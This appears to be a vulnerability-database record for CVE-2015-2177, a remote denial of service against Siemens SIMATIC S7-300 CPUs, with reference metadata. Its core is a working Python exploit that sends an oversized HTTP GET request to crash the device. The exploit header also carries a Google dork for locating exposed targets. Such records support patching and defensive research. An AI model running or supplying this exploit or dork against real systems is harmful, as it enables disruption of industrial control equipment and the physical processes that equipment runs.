ID
VAR-E-201805-0048
CVE
cve_id: | CVE-2015-2177 | Trust: 1.5 |
EDB ID
44802
TITLE
Siemens SIMATIC S7-300 CPU - Remote Denial of Service - Linux dos Exploit
Trust: 0.6
DESCRIPTION
Siemens SIMATIC S7-300 CPU - Remote Denial of Service. CVE-2015-2177 . dos exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | siemens | model: | simatic s7-300 cpu | scope: | - | version: | - | Trust: 2.1 |
EXPLOIT
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-30
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-300 CPU family: all versions.
# Tested on: Kali Linux
# CVE: CVE-2015-2177
#!/usr/bin/python
import socket
target_address="TargetIP"
target_port=80
buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Denial of Service
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
CREDITS
t4rkd3vilz
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 44802 | Trust: 1.6 |
db: | NVD | id: | CVE-2015-2177 | Trust: 1.5 |
db: | EDBNET | id: | 98137 | Trust: 0.6 |
db: | PACKETSTORM | id: | 147960 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2015-2177 | Trust: 1.5 |
url: | https://www.exploit-db.com/exploits/44802/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 147960 |
db: | EXPLOIT-DB | id: | 44802 |
db: | EDBNET | id: | 98137 |
LAST UPDATE DATE
2022-07-27T09:11:22.220000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 147960 | date: | 2018-05-30T02:22:22 |
db: | EXPLOIT-DB | id: | 44802 | date: | 2018-05-30T00:00:00 |
db: | EDBNET | id: | 98137 | date: | 2018-05-30T00:00:00 |